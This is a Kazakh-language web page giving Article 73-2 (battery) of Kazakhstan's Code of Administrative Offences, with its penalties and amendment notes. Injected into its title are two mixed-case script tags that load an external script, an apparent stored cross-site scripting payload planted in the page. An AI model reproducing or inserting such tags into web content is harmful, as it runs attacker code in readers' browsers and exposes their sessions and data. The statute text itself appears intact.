Әкiмшiлiк құқық бұзушылық туралы 73-2-бап. Ұрып-соғу<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.06.2022

Әкiмшiлiк құқық бұзушылық туралы
73-2-бап. Ұрып-соғу.1. Тән ауруына ұшыратқан, бiрақ денсаулыққа жеңіл зиян келтiруге әкеп соқпаған ұрып-соғу немесе өзге де күш қолдану әрекеттерiн жасау – 

он айлық есептік көрсеткіш мөлшерінде айыппұл салуға не он тәулікке дейінгі мерзімге әкімшілік қамаққа алуға алып келеді. 

1-1. Осы баптың бірінші бөлігінде көзделген, құқық бұзушымен отбасылық-тұрмыстық қатынастарда тұратын адамға қатысты жасалған әрекеттер – 

ескерту жасауға немесе он тәулікке дейінгі мерзімге әкімшілік қамаққа алуға алып келеді. 

2. Осы баптың бірінші және (немесе) 1-1-бөліктерінде көзделген, әкімшілік жаза қолданылғаннан кейін бір жыл ішінде қайталап жасалған әрекеттер – 

он бес тәулікке дейінгі мерзімге әкімшілік қамаққа алуға алып келеді. 

3. Осы баптың екінші бөлігінде көзделген, осы Кодекстің 50-бабының екінші бөлігіне сәйкес әкімшілік қамаққа алу қолданылмайтын адамдар жасаған әрекеттер – 

отыз айлық есептік көрсеткіш мөлшерінде айыппұл салуға алып келеді. 

Ескерту. 10-тарау 73-2-баппен толықтырылды - ҚР 03.07.2017 № 84-VI (алғашқы ресми жарияланған күнінен кейін күнтізбелік он күн өткен соң қолданысқа енгізіледі) ); өзгеріс енгізілд - ҚР 27.12.2019 № 292-VI (қолданысқа енгізілу тәртібін 2-баптан қараңыз) Заңдарымен.

Просмотров: 4993


Пікір қосу



Деректерді қолтаңбаға қосу